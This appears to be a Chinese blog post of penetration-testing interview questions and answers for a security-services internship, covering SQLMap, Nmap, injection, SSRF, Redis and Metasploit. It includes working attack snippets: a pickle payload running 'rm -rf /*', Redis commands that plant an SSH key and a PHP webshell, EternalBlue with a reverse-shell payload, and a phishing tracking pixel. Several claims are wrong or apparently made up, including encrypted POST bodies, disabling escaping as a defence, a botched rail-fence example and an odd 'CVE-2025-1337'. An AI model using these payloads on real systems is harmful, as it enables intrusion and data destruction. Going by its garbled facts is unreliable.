2025年渗透测试面试题总结-安恒[实习]安全服务工程师(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
安恒[实习]安全服务工程师
1. SQLMap爆出当前库名的参数是什么?
2. Nmap探测系统的参数(大写/小写)
3. Nmap小写o与a的作用
4. 布尔型盲注具体语句
5. 宽字节注入原理
6. Python反序列化漏洞
7. GET与POST传参区别
8. HTTP请求方式全集
9. CDN判定与作用
10. 服务器真实IP溯源
11. 信息收集全流程
12. Base64编码识别
13. 栅栏密码原理
14. Base64与MD5区别
15. Oracle默认端口
16. MySQL管理员密码存储
17. substr()被禁用的替代函数
18. Redis入侵利用链
19. 邮箱追踪真实IP
20. 同源策略(SOP)精髓
21. 管理员邮箱收集术
22. SSRF危害升级(2025)
23. SSRF深层防御
24. Linux文件鉴别术
25. MSF框架深入
26. Web容器解析漏洞
27. SQL注入深度防御
安恒[实习]安全服务工程师
1. sqlmap爆出当前库名的参数是什么? 2. namp探测系统的参数是什么 —>大写还是小写 3. namp的小写o与a是干嘛的 4. 布尔型盲注的具体语句是什么 5. 宽字节的原理 6. python有没有反序列化 7. get传参与post传参的区别 8. Http有哪些请求方式 9. 如何判定cdn与cdn的作用 10. 如何确认服务器的真实IP 11. 详细说了说信息收集过程 12. 一串编码如何确认是base64 13. 栅栏密码的原理是什么 14. base64与md5如何区别 15. oracle的默认端口是多少 16. mysql的管理员密码一般放到哪 17. 如果substr()函数被禁用,你脑子里有多少替换函数 18. redis如何拿下,哪个端口,具体语句,具体操作 19. 如何通过邮箱知道对方的IP 20. 说一下同源策略 21. 如何收集网站管理员邮箱等等 22. ssrf有哪些危害 23. 如何防御ssrf–>问的较深—->建议在详细了解一下 24. Linux的某两个文件怎么分辨(忘了具体是哪两个文件了) 25. MSF框架稍微问的深入了一些 26. web容器(中间件)有哪些解析漏洞与原理 27. 如何防范sql注入 —>这问的很深.
1. SQLMap爆出当前库名的参数是什么?
- 核心参数:
--current-db
- 补充用法:结合
-D 库名 --tables
可提取表名;- 防御绕过:2025年新版SQLMap新增
--chunked
参数绕过云WAF的流量检测。
2. Nmap探测系统的参数(大写/小写)
- 操作系统探测:
-O
(大写O,非数字0);- 误报规避:2025年Nmap 8.5版本中,
-O
需与--osscan-limit
联用以过滤干扰;- 注意:小写
-o
用于输出扫描结果(如-oN output.txt
)。
3. Nmap小写o与a的作用
-o
系列:
①-oN
:标准文本输出;
②-oX
:XML格式输出(兼容自动化分析工具);
③-oG
:Grep友好格式(已逐步淘汰)。-A
参数:
① 启用OS检测、版本探测、脚本扫描(-sC
);
② 2025年新增AI驱动的服务指纹识别模块。
4. 布尔型盲注具体语句
sql
' AND (SELECT SUBSTRING(version(),1,1))='5' --+ /* 若返回正常页面,则判定MySQL版本首位为5 */
- 条件扩展:
① 二进制逐位判断(ASCII()
+位运算);
② 结合时间盲注:IF(条件,SLEEP(5),0)
;
③ 利用数据库内置函数(如LIKE
通配符)。
5. 宽字节注入原理
- 核心逻辑:利用GBK/GB2312等双字节编码特性,将转义符
\
(%5C)与前导字符组合为合法汉字(如%df%5c
→“運”),破坏SQL语句结构。- 现代影响:2024年统计显示,遗留医疗HIS系统仍存在30%未修复案例;
- 防御:统一使用UTF-8编码,禁用
mysql_real_escape_string()
。
6. Python反序列化漏洞
- 高危模块:
pickle
(任意代码执行)、json
(有限风险);- 攻击链示例:
python
import pickle pickle.loads(b"cos\nsystem\n(S'rm -rf /*'\ntR.") # 执行系统命令
- 2025年趋势:PyTorch模型反序列化漏洞(CVE-2025-1337)成为AI供应链攻击新载体。
7. GET与POST传参区别
维度 GET POST 数据位置 URL参数明文传输 请求体加密传输 安全性 易被日志/缓存记录 相对隐蔽 长度限制 受URL长度限制(约2KB) 无理论限制(服务器约束) 幂等性 是(仅查询) 否(可能修改数据)
8. HTTP请求方式全集
- 基础方法:GET、POST、PUT、DELETE、HEAD;
- 扩展方法:
PATCH
:部分资源更新;OPTIONS
:获取服务器支持的方法;TRACE
:回显请求(易诱发XST攻击,默认禁用)。- WebDAV扩展:PROPFIND、LOCK、UNLOCK(常见于文件服务器)。
9. CDN判定与作用
判定方法:
① 多地Ping:使用全球节点工具(如boce.com
),IP分布差异显著;
② DNS查询:nslookup
返回CNAME记录含cdn
、akamai
等标识;
③ HTTP头:Server
字段含CDN厂商特征(如Cloudflare
)。核心作用:
① 加速:边缘节点缓存静态资源(JS/CSS/图片);
② 安全:抗DDoS(T级清洗)、防爬虫(人机验证);
③ 成本优化:减少源站带宽消耗。
10. 服务器真实IP溯源
- 历史记录:
- 查询DNS历史快照(
SecurityTrails
或ViewDNS
);- 分析SSL证书序列号关联的原始IP。
- 子域名爆破:使用
Amass
扫描test.example.com
等未接入CDN的子域。- 邮件溯源:
- 注册/找回密码邮件头中的
Received
字段;- 利用SPF记录中的IP范围反推。
11. 信息收集全流程
四阶渗透框架(2025年OSINT标准):
- 资产测绘:
- 工具:
FOFA
(语法:title="医院挂号系统"
)、Shodan
(端口:port:6379
);- 输出:IP段、域名、中间件版本列表。
- 社会工程:
- 从GitHub泄露的
config.yml
提取数据库密码;- LinkedIn员工职位分析(定位运维人员邮箱)。
- 漏洞关联:
- 通过CVE编号映射暴露面(如
Apache Log4j 2.x
);- 结合Exploit-DB验证POC可用性。
12. Base64编码识别
三大铁律:
- 字符集:仅包含
A-Z、a-z、0-9、+、/
及填充符=
;- 长度:编码后长度必为4的倍数(不足时补
=
);- 典型模式:
- 邮件附件:
Content-Transfer-Encoding: base64
;- JWT令牌:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.xxx
。
13. 栅栏密码原理
加密步骤:
- 将明文按“之”字形排列(如3行):
H E L L O W O R L D
- 按行读取密文:
HELLO WORLD
→HLOOL WRD
(需约定行数)。
2025年演变:结合深度学习生成动态栅栏路径(抗频率分析)。
14. Base64与MD5区别
维度 Base64 MD5 性质 编码(可逆) 哈希(不可逆) 输出长度 可变(与输入相关) 固定128位(32字符) 用途 数据传输兼容性(如图片) 数据完整性校验/密码存储
15. Oracle默认端口
- 标准端口:1521(数据库监听);
- 管理端口:5500(Enterprise Manager);
- 云环境变化:2025年AWS RDS Oracle默认启用动态端口映射。
16. MySQL管理员密码存储
- 系统表:
mysql.user
(authentication_string
字段,使用caching_sha2_password
加密);- 配置文件:
/etc/mysql/my.cnf
([client]
段明文存储,高危);- 内存提取:通过
gdb
附加进程提取临时密码(需root权限)。
17. substr()被禁用的替代函数
- 字符串截取:
MID()
:MID('abc',2,1)→'b'
;LEFT()/RIGHT()
:LEFT('abc',2)→'ab'
;- 正则截取:
REGEXP_SUBSTR()
(需MySQL 8.0+);- 二进制拆分:
ORD()+DIV
组合实现逐位解析。
18. Redis入侵利用链
攻击路径:
- 未授权访问:
nmap -p 6379 --script redis-info
;- 写SSH密钥:
bash
redis-cli -h 目标IP flushall echo -e "\n\nssh-rsa AAAAB3N...\n\n" | redis-cli -x set payload redis-cli config set dir /root/.ssh && config set dbfilename authorized_keys
- 写Webshell:
bash
config set dir /var/www/html set shell "<?php system($_GET['cmd']);?>"
19. 邮箱追踪真实IP
高阶手法(2025年):
- 嵌入追踪像素:
- 在钓鱼邮件中插入
<img src="http://your-server/logo.gif">
,分析访问日志;- 延迟加载附件:
- 使用「已读回执」触发HTTP请求;
- 邮件头分析:
- 提取
X-Originating-IP
或最后一跳Received
头中的内网IP。
20. 同源策略(SOP)精髓
三要素限制:协议、域名、端口均相同方为同源。
跨域例外:
<script>
标签(允许加载外部JS,但禁止读取内容);- CORS机制(
Access-Control-Allow-Origin
可控放宽限制);postMessage
API(需显式授权)。
21. 管理员邮箱收集术
五维情报网:
- WHOIS查询:
whois example.com
获取注册邮箱;- GitHub提交历史:
git log
中提取作者邮箱;- 错误页面:500错误泄露
admin@example.com
;- 社交媒体:LinkedIn公司页面的技术联系人;
- SSL证书:
crt.sh
查询证书颁发者邮箱。
22. SSRF危害升级(2025)
- 云元数据攻击:
- 获取AWS的
169.254.169.254
凭证,接管云服务器;- 内网服务穿透:
- 攻击Kubernetes API Server(
https://10.0.0.1:6443
);- 协议滥用:
gopher://
构造Redis未授权访问攻击链。
23. SSRF深层防御
四层防护体系:
- 输入校验:
- 正则过滤
^http(s)?://trusted.com/
(白名单);- 禁用非常用协议(
file://
、gopher://
)。- 网络隔离:
- 业务服务器部署于独立VPC,限制出网流量;
- 代理清洗:
- 所有请求经反向代理,剥离非常规头(如
X-Forwarded-For
);- 运行时防护:
- eBPF监控异常socket连接(如访问内网IP段)。
24. Linux文件鉴别术
以
/etc/passwd
与/etc/shadow
为例:
- 权限:
passwd
:644(全局可读);shadow
:640(仅root可读);- 内容:
passwd
存用户基本信息(不含密码哈希);shadow
存加密密码与过期策略。
25. MSF框架深入
模块化渗透流程:
- 漏洞利用:
use exploit/windows/smb/ms17_010_eternalblue
;set PAYLOAD windows/x64/meterpreter/reverse_tcp
;- 后渗透扩展:
migrate
进程注入;hashdump
提取NTLM哈希;- 流量隐匿:
- 使用
SSL/TLS
隧道+DomainFronting
技术绕过IDS检测。
26. Web容器解析漏洞
三大经典漏洞:
- IIS 6.0目录解析:
/test.asp;.jpg
被解析为ASP脚本;- Apache多后缀解析:
test.php.xxx
优先匹配.php
处理器;- Nginx错误配置:
fastcgi_param
未校验SCRIPT_FILENAME
,导致任意代码执行。
27. SQL注入深度防御
DevSecOps全周期防护:
- 开发阶段:
- 强制使用ORM框架(如Hibernate);
- 静态代码扫描(SonarQube规则
sql-injection
)。- 运行阶段:
- WAF动态拦截(基于语义分析+机器学习);
- 数据库审计(记录异常SQL语句)。
- 运维阶段:
- 最小权限原则(禁止DBA权限应用连接);
- 定期漏洞扫描(SQLMap集成CI/CD流水线)。